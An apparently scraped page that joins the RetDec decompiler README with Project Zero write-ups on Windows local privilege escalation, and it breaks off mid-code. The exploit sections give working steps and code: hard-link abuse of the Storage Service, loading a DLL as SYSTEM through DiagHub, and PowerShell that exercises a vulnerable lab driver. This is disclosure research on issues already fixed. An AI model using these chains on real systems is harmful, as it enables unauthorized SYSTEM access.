Retargetable Machine-Code Decompiler: RetDec

RetDec is a retargetable machine-code decompiler based on LLVM. The decompiler is not limited to any particular target architecture, operating system, or executable file format:

  • Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code.
  • Supported architectures (32b only): Intel x86, ARM, MIPS, PIC32, and PowerPC.

 

Features:

  • Static analysis of executable files with detailed information.
  • Compiler and packer detection.
  • Loading and instruction decoding.
  • Signature-based removal of statically linked library code.
  • Extraction and utilization of debugging information (DWARF, PDB).
  • Reconstruction of instruction idioms.
  • Detection and reconstruction of C++ class hierarchies (RTTI, vtables).
  • Demangling of symbols from C++ binaries (GCC, MSVC, Borland).
  • Reconstruction of functions, types, and high-level constructs.
  • Integrated disassembler.
  • Output in two high-level languages: C and a Python-like language.
  • Generation of call graphs, control-flow graphs, and various statistics.

 

After seven years of development, Avast open-sources its machine-code decompiler for platform-independent analysis of executable files. Avast released its analytical tool, RetDec, to help the cybersecurity community fight malicious software. The tool allows anyone to study the code of applications to see what the applications do, without running them. The goal behind open sourcing RetDec is to provide a generic tool to transform platform-specific code, such as x86/PE executable files, into a higher form of representation, such as C source code. By generic, we mean that the tool should not be limited to a single platform, but rather support a variety of platforms, including different architectures, file formats, and compilers. At Avast, RetDec is actively used for analysis of malicious samples for various platforms, such as x86/PE and ARM/ELF.

 

What is a decompiler?

A decompiler is a program that takes an executable file as its input and attempts to transform it into a high-level representation while preserving its functionality. For example, the input file may be application.exe, and the output can be source code in a higher-level programming language, such as C. A decompiler is, therefore, the exact opposite of a compiler, which compiles source files into executable files; this is why decompilers are sometimes also called reverse compilers.

By preserving a program’s functionality, we want the source code to reflect what the input program does as accurately as possible; otherwise, we risk assuming the program does one thing, when it really does another.

Generally, decompilers are unable to perfectly reconstruct original source code, due to the fact that a lot of information is lost during the compilation process. Furthermore, malware authors often use various obfuscation and anti-decompilation tricks to make the decompilation of their software as difficult as possible.

RetDec addresses the above mentioned issues by using a large set of supported architectures and file formats, as well as in-house heuristics and algorithms to decode and reconstruct applications. RetDec is also the only decompiler of its scale using a proven LLVM infrastructure and provided for free, licensed under MIT.

Decompilers can be used in a variety of situations. The most obvious is reverse engineering when searching for bugs, vulnerabilities, or analyzing malicious software. Decompilation can also be used to retrieve lost source code when comparing two executables, or to verify that a compiled program does exactly what is written in its source code.

There are several important differences between a decompiler and a disassembler. The former tries to reconstruct an executable file into a platform-agnostic, high-level source code, while the latter gives you low-level, platform-specific assembly instructions. The assembly output is non-portable, error-prone when modified, and requires specific knowledge about the instruction set of the target processor. Another positive aspect of decompilers is the high-level source code they produce, like  C source code, which can be read by people who know nothing about the assembly language for the particular processor being analyzed.

 

Installation and Use

Currently,RetDec support only Windows (7 or later) and Linux.

 

Windows

  1. Either download and unpack a pre-built package from the following list, or build and install the decompiler by yourself (the process is described below):
  2. Install Microsoft Visual C++ Redistributable for Visual Studio 2015.
  3. Install MSYS2 and other needed applications by following RetDec’s Windows environment setup guide.
  4. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALLED_DIR/bin and run:
    bash decompile.sh test.exe
    

    For more information, run bash decompile.sh --help.

 

Linux

  1. There are currently no pre-built packages for Linux. You will have to build and install the decompiler by yourself. The process is described below.
  2. After you have built the decompiler, you will need to install the following packages via your distribution’s package manager:
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALLED_DIR/bin and run:
    ./decompile.sh test.exe
    

    For more information, run ./decompile.sh --help.

 

Build and Installation


Requirements

Linux

On Debian-based distributions (e.g. Ubuntu), the required packages can be installed with apt-get:

sudo apt-get install build-essential cmake git perl python bash coreutils wget bc graphviz upx flex bison zlib1g-dev libtinfo-dev autoconf pkg-config m4 libtool

 

Windows

  • Microsoft Visual C++ (version >= Visual Studio 2015 Update 2)
  • Git
  • MSYS2 and some other applications. Follow RetDec’s Windows environment setup guide to get everything you need on Windows.
  • Active Perl. It needs to be the first Perl in PATH, or it has to be provided to CMake using CMAKE_PROGRAM_PATH variable, e.g. -DCMAKE_PROGRAM_PATH=/c/perl/bin.
  • Python (version >= 3.4)

 

Process

Warning: Currently, RetDec has to be installed into a clean, dedicated directory. Do NOT install it into /usr,/usr/local, etc. because our build system is not yet ready for system-wide installations. So, when running cmake, always set -DCMAKE_INSTALL_PREFIX=<path> to a directory that will be used just by RetDec. 

  • Recursively clone the repository (it contains submodules):
    • git clone --recursive https://github.com/avast-tl/retdec
  • Linux:
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make && make install
  • Windows:
    • Open MSBuild command prompt, or any terminal that is configured to run the msbuild command.
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path> -G<generator>
    • msbuild /m /p:Configuration=Release retdec.sln
    • msbuild /m /p:Configuration=Release INSTALL.vcxproj
    • Alternatively, you can open retdec.sln generated by cmake in Visual Studio IDE.

You have to pass the following parameters to cmake:

  • -DCMAKE_INSTALL_PREFIX=<path> to set the installation path to <path>.
  • (Windows only) -G<generator> is -G"Visual Studio 14 2015" for 32-bit build using Visual Studio 2015, or -G"Visual Studio 14 2015 Win64" for 64-bit build using Visual Studio 2015. Later versions of Visual Studio may be used.

You can pass the following additional parameters to cmake:

  • -DRETDEC_DOC=ON to build with API documentation (requires Doxygen and Graphviz, disabled by default).
  • -DRETDEC_TESTS=ON to build with tests, including all the tests in dependency submodules (disabled by default).
  • -DCMAKE_BUILD_TYPE=Debug to build with debugging information, which is useful during development. By default, the project is built in the Release mode. This has no effect on Windows, but the same thing can be achieved by running msbuild with the /p:Configuration=Debug parameter.
  • -DCMAKE_PROGRAM_PATH=<path> to use Perl at <path> (probably useful only on Windows).

Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege

Previously I presented a technique to exploit arbitrary directory creation vulnerabilities on Windows to give you read access to any file on the system. In the upcoming Spring Creators Update (RS4) the abuse of mount points to link to files as I exploited in the previous blog post has been remediated. This is an example of a long term security benefit from detailing how vulnerabilities might be exploited, giving a developer an incentive to find ways of mitigating the exploitation vector.

Keeping with that spirit in this blog post I’ll introduce a novel technique to exploit the more common case of arbitrary file writes on Windows 10. Perhaps once again Microsoft might be able to harden the OS to make it more difficult to exploit these types of vulnerabilities. I’ll demonstrate exploitation by describing in detail the recently fixed issue that Project Zero reported to Microsoft (issue 1428).

An arbitrary file write vulnerability is where a user can create or modify a file in a location they could not normally access. This might be due to a privileged service incorrectly sanitizing information passed by the user or due to a symbolic link planting attack where the user can write a link into a location which is subsequently used by the privileged service. The ideal vulnerability is one where the attacking user not only controls the location of the file being written but also the entire contents. This is the type of vulnerability we’ll consider in this blog post.

A common way of exploiting arbitrary file writes is to perform DLL hijacking. When a Windows executable begins executing the initial loader in NTDLL will attempt to find all imported DLLs. The locations that the loader checks for imported DLLs are more complex than you’d expect but for our purposes can be summarized as follows: 

  1. Check Known DLLs, which is a pre-cached list of DLLs which are known to the OS. If found, the DLL is mapped into memory from a pre-loaded section object.
  2. Check the application’s directory, for example if importing TEST.DLL and the application is in C:\APP then it will check C:\APP\TEST.DLL.
  3. Check the system locations, such as C:\WINDOWS\SYSTEM32 and C:\WINDOWS.
  4. If all else fails search the current environment PATH.

The aim of the DLL hijack is to find an executable which runs at a high privilege which will load a DLL from a location that the vulnerability allows us to write to. The hijack only succeeds if the DLL hasn’t already been found in a location checked earlier.

There are two problems which make DLL hijacking annoying:

 

  1. You typically need to create a new instance of a privileged process as the majority of DLL imports are resolved when the process is first executed.
  2. Most system binaries, executables and DLLs that will run as a privileged user will be installed into SYSTEM32.

The second problem means that in steps 2 and 3 the loader will always look for DLLs in SYSTEM32. Assuming that overwriting a DLL isn’t likely to be an option (at the least if the DLL is already loaded you can’t write to the file), that makes it harder to find a suitable DLL to hijack. A typical way around these problems is to pick an executable that is not located in SYSTEM32 and which can be easily activated, such as by loading a COM server or running a scheduled task.

Even if you find a suitable target executable to DLL hijack the implementation can be quite ugly. Sometimes you need to implement stub exports for the original DLL, otherwise the loading of the DLL will fail. In other cases the best place to run code is during DllMain, which introduces other problems such as running code inside the loader lock. What would be nice is a privileged service that will just load an arbitrary DLL for us, no hijacking, no needing to spawn the “correct” privileged process. The question is, does such a service exist?

It turns out yes one does, and the service itself has been abused at least twice previously, once by Lokihardt for a sandbox escape, and once by me for user to system EoP. This service goes by the name “Microsoft (R) Diagnostics Hub Standard Collector Service,” but we’ll call it DiagHub for short.

The DiagHub service was introduced in Windows 10, although there’s a service that performs a similar task called IE ETW Collector in Windows 7 and 8.1. The purpose of the service is to collect diagnostic information using Event Tracing for Windows (ETW) on behalf of sandboxed applications, specifically Edge and Internet Explorer. One of its interesting features is that it can be configured to load an arbitrary DLL from the SYSTEM32 directory, which is the exact feature that Lokihardt and I exploited to gain elevated privileges. All the functionality for the service is exposed over a registered DCOM object, so in order to load our DLL we’ll need to work out how to call methods on that DCOM object. At this point you can skip to the end but if you want to understand how I would go about finding how the DCOM object is implemented, the next section might be of interest.

Reverse Engineering a DCOM Object

Let’s go through the steps I would take to try and find what interfaces an unknown DCOM object supports and find the implementation so we can reverse engineer them. There are two approaches I will typically take, go straight for RE in IDA Pro or similar, or do some on-system inspection first to narrow down the areas we have to investigate. Here we’ll go for the second approach as it’s more informative. I can’t say how Lokihardt found his issue; I’m going to opt for magic.

For this approach we’ll need some tools, specifically my OleViewDotNet v1.4+ (OVDN) tool from github as well as an installation of WinDBG from the SDK. The first step is to find the registration information for the DCOM object and discover what interfaces are accessible. We know that the DCOM object is hosted in a service so once you’ve loaded OVDN go to the menu Registry ⇒ Local Services and the tool will load a list of registered system services which expose COM objects. If you now find the  “Microsoft (R) Diagnostics Hub Standard Collector Service” service (applying a filter here is helpful) you should find the entry in the list. If you open the service tree node you’ll see a child, “Diagnostics Hub Standard Collector Service,” which is the hosted DCOM object. If you open that tree node the tool will create the object, then query for all remotely accessible COM interfaces to give you a list of interfaces the object supports. I’ve shown this in the screenshot below:

While we’re here it’s useful to inspect what security is required to access the DCOM object. If you right click the class treenode you can select View Access Permissions or View Launch Permissions and you’ll get a window that shows the permissions. In this case it shows that this DCOM object will be accessible from IE Protected Mode as well as Edge’s AppContainer sandbox, including LPAC.

Of the list of interfaces shown we only really care about the standard interfaces. Sometimes there are interesting interfaces in the factory but in this case there aren’t. Of these standard interfaces there are two we care about, the IStandardCollectorAuthorizationService and IStandardCollectorService. Just to cheat slightly I already know that it’s the IStandardCollectorService service we’re interested in, but as the following process is going to be the same for each of the interfaces it doesn’t matter which one we pick first. If you right click the interface treenode and select Properties you can see a bit of information about the registered interface.

There’s not much more information that will help us here, other than we can see there are 8 methods on this interface. As with a lot of COM registration information, this value might be missing or erroneous, but in this case we’ll assume it’s correct. To understand what the methods are we’ll need to track down the implementation of IStandardCollectorService inside the COM server. This knowledge will allow us to target our RE efforts to the correct binary and the correct methods. Doing this for an in-process COM object is relatively easy as we can query for an object’s VTable pointer directly by dereferencing a few pointers. However, for out-of-process it’s more involved. This is because the actual in-process object you’d call is really a proxy for the remote object, as shown in the following diagram:

All is not lost, however; we can still find the the VTable of the OOP object by extracting the information stored about the object in the server process. Start by right clicking the “Diagnostics Hub Standard Collector Service” object tree node and select Create Instance. This will create a new instance of the COM object as shown below:

The instance gives you basic information such as the CLSID for the object which we’ll need later (in this case {42CBFAA7-A4A7-47BB-B422-BD10E9D02700}) as well as the list of supported interfaces. Now we need to ensure we have a connection to the interface we’re interested in. For that select theIStandardCollectorService interface in the lower list, then in the Operations menu at the bottom selectMarshal ⇒ View Properties. If successful you’ll now see the following new view:

There’s a lot of information in this view but the two pieces of most interest are the Process ID of the hosting service and the Interface Pointer Identifier (IPID). In this case the Process ID should be obvious as the service is running in its own process, but this isn’t always the case—sometimes when you create a COM object you’ve no idea which process is actually hosting the COM server so this information is invaluable. The IPID is the unique identifier in the hosting process for the server end of the DCOM object; we can use the Process ID and the IPID in combination to find this server and from that find out the location of the actual VTable implementing the COM methods. It’s worth noting that the maximum Process ID size from the IPID is 16 bits; however, modern versions of Windows can have much larger PIDs so there’s a chance that you’ll have to find the process manually or restart the service multiple times until you get a suitable PID.

Now we’ll use a feature of OVDN which allows us to reach into the memory of the server process and find the IPID information. You can access information about all processes through the main menu Object ⇒ Processes but as we know which process we’re interested in just click the View button next to the Process ID in the marshal view. You do need to be running OVDN as an administrator otherwise you’ll not be able to open the service process. If you’ve not done so already the tool will ask you to configure symbol support as OVDN needs public symbols to find the correct locations in the COM DLLs to parse. You’ll want to use the version of DBGHELP.DLL which comes with WinDBG as that supports remote symbol servers. Configure the symbols similar to the following dialog:

If everything is correctly configured and you’re an administrator you should now see more details about the IPID, as shown below:

 

The two most useful pieces of information here are the Interface pointer, which is the location of the heap allocated object (in case you want to inspect its state), and the VTable pointer for the interface. The VTable address gives us information for where exactly the COM server implementation is located. As we can see here the VTable is located in a different module (DiagnosticsHub.StandardCollector.Runtime) from the main executable (DiagnosticsHub.StandardCollector.Server). We can verify the VTable address is correct by attaching to the service process using WinDBG and dumping the symbols at the VTable address. We also know from before we’re expecting 8 methods so we can take that into account by using the command:

dqs DiagnosticsHub_StandardCollector_Runtime+0x36C78 L8

Note that WinDBG converts periods in a module name to underscores. If successful you’ll see the something similar to the following screenshot:

Extracting out that information we now get the name of the methods (shown below) as well as the address in the binary. We could set breakpoints and see what gets called during normal operation, or take this information and start the RE process.

ATL::CComObject<StandardCollectorService>::QueryInterface

ATL::CComObjectCached<StandardCollectorService>::AddRef

ATL::CComObjectCached<StandardCollectorService>::Release

StandardCollectorService::CreateSession

StandardCollectorService::GetSession

StandardCollectorService::DestroySession

StandardCollectorService::DestroySessionAsync

StandardCollectorService::AddLifetimeMonitorProcessIdForSession

The list of methods looks correct: they start with the 3 standard methods for a COM object, which in this case are implemented by the ATL library. Following those methods are five implemented by theStandardCollectorService class. Being public symbols, this doesn’t tell us what parameters we expect to pass to the COM server. Due to C++ names containing some type information, IDA Pro might be able to extract that information for you, however that won’t necessarily tell you the format of any structures which might be passed to the function. Fortunately due to how COM proxies are implemented using the Network Data Representation (NDR) interpreter to perform marshalling, it’s possible to reverse the NDR bytecode back into a format we can understand. In this case go back to the original service information, right click theIStandardCollectorService treenode and select View Proxy Definition. This will get OVDN to parse the NDR proxy information and display a new view as shown below.

Viewing the proxy definition will also parse out any other interfaces which that proxy library implements. This is likely to be useful for further RE work. The decompiled proxy definition is shown in a C# like pseudo code but it should be easy to convert into working C# or C++ as necessary. Notice that the proxy definition doesn’t contain the names of the methods but we’ve already extracted those out. So applying a bit of cleanup and the method names we get a definition which looks like the following:

[uuid(«0d8af6b7-efd5-4f6d-a834-314740ab8caa»)]
struct IStandardCollectorService : IUnknown {
   HRESULT CreateSession(_In_ struct Struct_24* p0, 
                         _In_ IStandardCollectorClientDelegate* p1,
                         _Out_ ICollectionSession** p2);
   HRESULT GetSession(_In_ GUID* p0, _Out_ ICollectionSession** p1);
   HRESULT DestroySession(_In_ GUID* p0);
   HRESULT DestroySessionAsync(_In_ GUID* p0);
   HRESULT AddLifetimeMonitorProcessIdForSession(_In_ GUID* p0, [In] int p1);
}

There’s one last piece missing; we don’t know the definition of the Struct_24 structure. It’s possible to extract this from the RE process but fortunately in this case we don’t have to. The NDR bytecode must know how to marshal this structure across so OVDN just extracts the structure definition out for us automatically: select the Structures tab and find Struct_24.

As you go through the RE process you can repeat this process as necessary until you understand how everything works. Now let’s get to actually exploiting the DiagHub service and demonstrating its use with a real world exploit.

Example Exploit

So after our efforts of reverse engineering, we’ll discover that in order to to load a DLL from SYSTEM32 we need to do the following steps:

  1. Create a new Diagnostics Session using IStandardCollectorService::CreateSession.
  2. Call the ICollectionSession::AddAgent method on the new session, passing the name of the DLL to load (without any path information).

The simplified loading code for ICollectionSession::AddAgent is as follows:

void EtwCollectionSession::AddAgent(LPWCSTR dll_path, 
                                   REFGUID guid) {
 WCHAR valid_path[MAX_PATH];
 if ( !GetValidAgentPath(dll_path, valid_path)) {
   return E_INVALID_AGENT_PATH;
 HMODULE mod = LoadLibraryExW(valid_path, 
       nullptr, LOAD_WITH_ALTERED_SEARCH_PATH);
 dll_get_class_obj = GetProcAddress(hModule, «DllGetClassObject»);
 return dll_get_class_obj(guid);
}

We can see that it checks that the agent path is valid and returns a full path (this is where the previous EoP bugs existed, insufficient checks). This path is loading using LoadLibraryEx, then the DLL is queried for the exported method DllGetClassObject which is then called. Therefore to easily get code execution all we need is to implement that method and drop the file into SYSTEM32. The implemented DllGetClassObject will be called outside the loader lock so we can do anything we want. The following code (error handling removed) will be sufficient to load a DLL called dummy.dll.

IStandardCollectorService* service;
CoCreateInstance(CLSID_CollectorService, nullptr, CLSCTX_LOCAL_SERVER,IID_PPV_ARGS(&service));

SessionConfiguration config = {};
config.version = 1;
config.monitor_pid = ::GetCurrentProcessId();
CoCreateGuid(&config.guid);
config.path = ::SysAllocString(L»C:\Dummy»);
ICollectionSession* session;
service->CreateSession(&config, nullptr, &session);

GUID agent_guid;
CoCreateGuid(&agent_guid);
session->AddAgent(L»dummy.dll», agent_guid);

All we need now is the arbitrary file write so that we can drop a DLL into SYSTEM32, load it and elevate our privileges. For this I’ll demonstrate using a vulnerability I found in the SvcMoveFileInheritSecurity RPC method in the system Storage Service. This function caught my attention due to its use in an exploit for a vulnerability in ALPC discovered and presented by Clément Rouault & Thomas Imbert at PACSEC 2017. While this method was just a useful exploit primitive for the vulnerability I realized it has not one, but two actual vulnerabilities lurking in it (at least from a normal user privilege). The code prior to any fixes forSvcMoveFileInheritSecurity looked like the following:

void SvcMoveFileInheritSecurity(LPCWSTR lpExistingFileName, 
                               LPCWSTR lpNewFileName, 
                               DWORD dwFlags) {
 PACL pAcl;
 if (!RpcImpersonateClient()) {
   // Move file while impersonating.
   if (MoveFileEx(lpExistingFileName, lpNewFileName, dwFlags)) {
     RpcRevertToSelf();
     // Copy inherited DACL while not.
     InitializeAcl(&pAcl, 8, ACL_REVISION);
     DWORD status = SetNamedSecurityInfo(lpNewFileName, SE_FILE_OBJECT, 
         UNPROTECTED_DACL_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION,
         nullptr, nullptr, &pAcl, nullptr);
       if (status != ERROR_SUCCESS)
         MoveFileEx(lpNewFileName, lpExistingFileName, dwFlags);
   }
   else {
     // Copy file instead…
     RpcRevertToSelf();
   }
 }
}

The purpose of this method seems to be to move a file then apply any inherited ACE’s to the DACL from the new directory location. This would be necessary as when a file is moved on the same volume, the old filename is unlinked and the file is linked to the new location. However, the new file will maintain the security assigned from its original location. Inherited ACEs are only applied when a new file is created in a directory, or as in this case, the ACEs are explicitly applied by calling a function such as SetNamedSecurityInfo.

To ensure this method doesn’t allow anyone to move an arbitrary file while running as the service’s user, which in this case is Local System, the RPC caller is impersonated. The trouble starts immediately after the first call to MoveFileEx, the impersonation is reverted and SetNamedSecurityInfo is called. If that call fails then the code calls MoveFileEx again to try and revert the original move operation. This is the first vulnerability; it’s possible that the original filename location now points somewhere else, such as through the abuse of symbolic links. It’s pretty easy to cause SetNamedSecurityInfo to fail, just add a Deny ACL for Local System to the file’s ACE for WRITE_DAC and it’ll return an error which causes the revert and you get an arbitrary file creation. This was reported as issue 1427.

This is not in fact the vulnerability we’ll be exploiting, as that would be too easy. Instead we’ll exploit a second vulnerability in the same code: the fact that we can get the service to call SetNamedSecurityInfo on any file we like while running as Local System. This can be achieved either by abusing the impersonated device map to redirect the local drive letter (such as C:) when doing the initial MoveFileEx, which then results in lpNewFileName pointing to an arbitrary location, or more interestingly abusing hard links. This was reported as issue 1428. We can exploit this using hard links as follows:

  1. Create a hard link to a target file in SYSTEM32 that we want to overwrite. We can do this as you don’t need to have write privileges to a file to create a hard link to it, at least outside of a sandbox.
  2. Create a new directory location that has an inheritable ACE for a group such as Everyone or Authenticated Users to allow for modification of any new file. You don’t even typically need to do this explicitly; for example, any new directory created in the root of the C: drive has an inherited ACE for Authenticated Users. Then a request can be made to the RPC service to move the hardlinked file to the new directory location. The move succeeds under impersonation as long as we have FILE_DELETE_CHILD access to the original location and FILE_ADD_FILE in the new location, which we can arrange.
  3. The service will now call SetNamedSecurityInfo on the moved hardlink file. SetNamedSecurityInfo will pick up the inherited ACEs from the new directory location and apply them to the hardlinked file. The reason the ACEs are applied to the hardlinked file is from the perspective of SetNamedSecurityInfo the hardlinked file is in the new location, even though the original target file we linked to was in SYSTEM32.

By exploiting this we can modify the security of any file that Local System can access for WRITE_DAC access. Therefore we can modify a file in SYSTEM32, then use the DiagHub service to load it. There is a slight problem, however. The majority of files in SYSTEM32 are actually owned by the TrustedInstaller group and so cannot be modified, even by Local System. We need to find a file we can write to which isn’t owned by TrustedInstaller. Also we’d want to pick a file that won’t cause the OS install to become corrupt. We don’t care about the file’s extension as AddAgent only checks that the file exists and loads it with LoadLibraryEx. There are a number of ways we can find a suitable file, such as using the SysInternals AccessChk utility, but to be 100% certain that the Storage Service’s token can modify the file we’ll use my NtObjectManagerPowerShell module (specifically its Get-AccessibleFile cmdlet, which accepts a process to do the access check from). While the module was designed for checking accessible files from a sandbox, it also works to check for files accessible by privileged services. If you run the following script as an administrator with the module installed the $files variable will contain a list of files that the Storage Service has WRITE_DAC access to.

Import-Module NtObjectManager

Start-Service Name «StorSvc»
Set-NtTokenPrivilege SeDebugPrivilege | Out-Null
$files = Use-NtObject($p = Get-NtProcess ServiceName «StorSvc») {
   Get-AccessibleFile Win32Path C:\Windows\system32 Recurse `
    MaxDepth 1 FormatWin32Path AccessRights WriteDac CheckMode FilesOnly
}

Looking through the list of files I decided to pick on the file license.rtf, which contains a short license statement for Windows. The advantage of this file is it’s very likely to be not be critical to the operation of the system and so overwriting it shouldn’t cause the installation to become corrupted.

So putting it all together:

  1. Use the Storage Service vulnerability to change the security of the license.rtf file inside SYSTEM32.
  2. Copy a DLL, which implements DllGetClassObject over the license.rtf file.
  3. Use the DiagHub service to load our modified license file as a DLL, get code execution as Local System and do whatever we want.

If you’re interested in seeing a fully working example, I’ve uploaded a full exploit to the original issue on the tracker.

Wrapping Up

In this blog post I’ve described a useful exploit primitive for Windows 10, which you can even use from some sandboxed environments such as Edge LPAC. Finding these sorts of primitives makes exploitation much simpler and less error-prone. Also I’ve given you a taste of how you can go about finding your own bugs in similar DCOM implementations.

Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read

For the past couple of months I’ve been presenting my “Introduction to Windows Logical Privilege Escalation Workshop” at a few conferences. The restriction of a 2 hour slot fails to do the topic justice and some interesting tips and tricks I would like to present have to be cut out. So as the likelihood of a full training course any time soon is pretty low, I thought I’d put together an irregular series of blog posts which detail small, self contained exploitation tricks which you can put to use if you find similar security vulnerabilities in Windows.

 

In this post I’m going to give a technique to go from an arbitrary directory creation vulnerability to arbitrary file read. Arbitrary direction creation vulnerabilities do exist — for example, here’s one that was in the Linux subsystem — but it’s not always obvious how you’d exploit such a bug in contrast to arbitrary file creation where a DLL is dropped somewhere. You could abuse DLL Redirection support where you create a directory calling program.exe.local to do DLL planting but that’s not always reliable as you’ll only be able to redirect DLLs not in the same directory (such as System32) and only ones which would normally go via Side-by-Side DLL loading.

 

For this blog we’ll use my example driver from the Workshop which already contains a vulnerable directory creation bug, and we’ll write a Powershell script to exploit it using my NtObjectManager module. The technique I’m going to describe isn’t a vulnerability, but it’s something you can use if you have a separate directory creation bug.

Quick Background on the Vulnerability Class

When dealing with files from the Win32 API you’ve got two functions, CreateFile and CreateDirectory. It would make sense that there’s a separation between the two operations. However at the Native API level there’s only ZwCreateFile, the way the kernel separates files and directories is by passing either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE to the CreateOptions parameter when calling ZwCreateFile. Why the system call is for creating a file and yet the flags are named as if Directories are the main file type I’ve no idea.

 

A very simple vulnerable example you might see in a kernel driver looks like the following:

 

NTSTATUS KernelCreateDirectory(PHANDLE Handle,

                              PUNICODE_STRING Path) {
 IO_STATUS_BLOCK io_status = { 0 };
 OBJECT_ATTRIBUTES obj_attr = { 0 };

 InitializeObjectAttributes(&obj_attr, Path,
    OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE);
 
 return ZwCreateFile(Handle, MAXIMUM_ALLOWED,

                     &obj_attr, &io_status,
                     NULL, FILE_ATTRIBUTE_NORMAL,

                    FILE_SHARE_READ | FILE_SHARE_DELETE,
                    FILE_OPEN_IF, FILE_DIRECTORY_FILE, NULL, 0);
}

 

There’s three important things to note about this code that determines whether it’s a vulnerable directory creation vulnerability. Firstly it’s passing FILE_DIRECTORY_FILE to CreateOptions which means it’s going to create a directory. Second it’s passing as the Disposition parameter FILE_OPEN_IF. This means the directory will be created if it doesn’t exist, or opened if it does. And thirdly, and perhaps most importantly, the driver is calling a Zw function, which means that the call to create the directory will default to running with kernel permissions which disables all access checks. The way to guard against this would be to pass the OBJ_FORCE_ACCESS_CHECK attribute flag in the OBJECT_ATTRIBUTES, however we can see with the flags passed to InitializeObjectAttributes the flag is not being set in this case.

 

Just from this snippet of code we don’t know where the destination path is coming from, it could be from the user or it could be fixed. As long as this code is running in the context of the current process (or is impersonating your user account) it doesn’t really matter. Why is running in the current user’s context so important? It ensures that when the directory is created the owner of that resource is the current user which means you can modify the Security Descriptor to give you full access to the directory. In many cases even this isn’t necessary as many of the system directories have a CREATOR OWNER access control entry which ensures that the owner gets full access immediately.

Creating an Arbitrary Directory

If you want to follow along you’ll need to setup a Windows 10 VM (doesn’t matter if it’s 32 or 64 bit) and follow the details in setup.txt from the zip file containing my Workshop driver. Then you’ll need to install the NtObjectManager Powershell Module. It’s available on the Powershell Gallery, which is an online module repository so follow the details there.

Assuming that’s all done, let’s get to work. First let’s look how we can call the vulnerable code in the driver. The driver exposes a Device Object to the user with the name \Device\WorkshopDriver (we can see the setup in the source code). All “vulnerabilities” are then exercised by sending Device IO Control requests to the device object. The code for the IO Control handling is in device_control.c and we’re specifically interested in the dispatch. The code ControlCreateDir is the one we’re looking for, it takes the input data from the user and uses that as an unchecked UNICODE_STRING to pass to the code to create the directory. If we look up the code to create the IOCTL number we find ControlCreateDir is 2, so let’s use the following PS code to create an arbitrary directory.

 

Import-Module NtObjectManager

# Get an IOCTL for the workshop driver.
function Get-DriverIoCtl {
   Param([int]$ControlCode)
   [NtApiDotNet.NtIoControlCode]::new(«Unknown»,`
       0x800 bor $ControlCode, «Buffered», «Any»)
}

function New-Directory {
 Param([string]$Filename)
 # Open the device driver.
 Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
   # Get IOCTL for ControlCreateDir (2)
   $ioctl = Get-DriverIoCtl ControlCode 2
   # Convert DOS filename to NT
   $nt_filename = [NtApiDotNet.NtFileUtils]::DosFileNameToNt($Filename)
   $bytes = [Text.Encoding]::Unicode.GetBytes($nt_filename)
   $file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
 }
}

 

The New-Directory function first opens the device object, converts the path to a native NT format as an array of bytes and calls the DeviceIoControl function on the device. We could just pass an integer value for control code but the NT API libraries I wrote have an NtIoControlCode type to pack up the values for you. Let’s try it and see if it works to create the directory c:\windows\abc.


It works and we’ve successfully created the arbitrary directory. Just to check we use Get-Acl to get the Security Descriptor of the directory and we can see that the owner is the ‘user’ account which means we can get full access to the directory.

Now the problem is what to do with this ability? There’s no doubt some system service which might look up in a list of directories for an executable to run or a configuration file to parse. But it’d be nice not to rely on something like that. As the title suggested instead we’ll convert this into an arbitrary file read, how might do we go about doing that?

Mount Point Abuse

If you’ve watched my talk on Abusing Windows Symbolic Links you’ll know how NTFS mount points (or sometimes Junctions) work. The $REPARSE_POINT NTFS attribute is stored with the Directory which the NTFS driver reads when opening a directory. The attribute contains an alternative native NT object manager path to the destination of the symbolic link which is passed back to the IO manager to continue processing. This allows the Mount Point to work between different volumes, but it does have one interesting consequence. Specifically the path doesn’t have to actually to point to another directory, what if we give it a path to a file?

 

If you use the Win32 APIs it will fail and if you use the NT apis directly you’ll find you end up in a weird paradox. If you try and open the mount point as a file the error will say it’s a directory, and if you instead try to open as a directory it will tell you it’s really a file. Turns out if you don’t specify either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE then the NTFS driver will pass its checks and the mount point can actually redirect to a file.

Perhaps we can find some system service which will open our file without any of these flags (if you pass FILE_FLAG_BACKUP_SEMANTICS to CreateFile this will also remove all flags) and ideally get the service to read and return the file data?

National Language Support

Windows supports many different languages, and in order to support non-unicode encodings still supports Code Pages. A lot is exposed through the National Language Support (NLS) libraries, and you’d assume that the libraries run entirely in user mode but if you look at the kernel you’ll find a few system calls here and there to support NLS. The one of most interest to this blog is the NtGetNlsSectionPtr system call. This system call maps code page files from the System32 directory into a process’ memory where the libraries can access the code page data. It’s not entirely clear why it needs to be in kernel mode, perhaps it’s just to make the sections shareable between all processes on the same machine. Let’s look at a simplified version of the code, it’s not a very big function:

 

NTSTATUS NtGetNlsSectionPtr(DWORD NlsType,

                           DWORD CodePage,
                           PVOID *SectionPointer,

                           PULONG SectionSize) {
 UNICODE_STRING section_name;
 OBJECT_ATTRIBUTES section_obj_attr;
 HANDLE section_handle;
 RtlpInitNlsSectionName(NlsType, CodePage, &section_name);
 InitializeObjectAttributes(&section_obj_attr,

                            &section_name,
                            OBJ_KERNEL_HANDLE |

                            OBJ_OPENIF |

                            OBJ_CASE_INSENSITIVE |

                            OBJ_PERMANENT);
    
 // Open section under \NLS directory.
 if (!NT_SUCCESS(ZwOpenSection(&section_handle,

                        SECTION_MAP_READ,

                        &section_obj_attr))) {
   // If no section then open the corresponding file and create section.
   UNICODE_STRING file_name;

   OBJECT_ATTRIBUTES obj_attr;
   HANDLE file_handle;


   RtlpInitNlsFileName(NlsType,

                       CodePage,

                       &file_name);
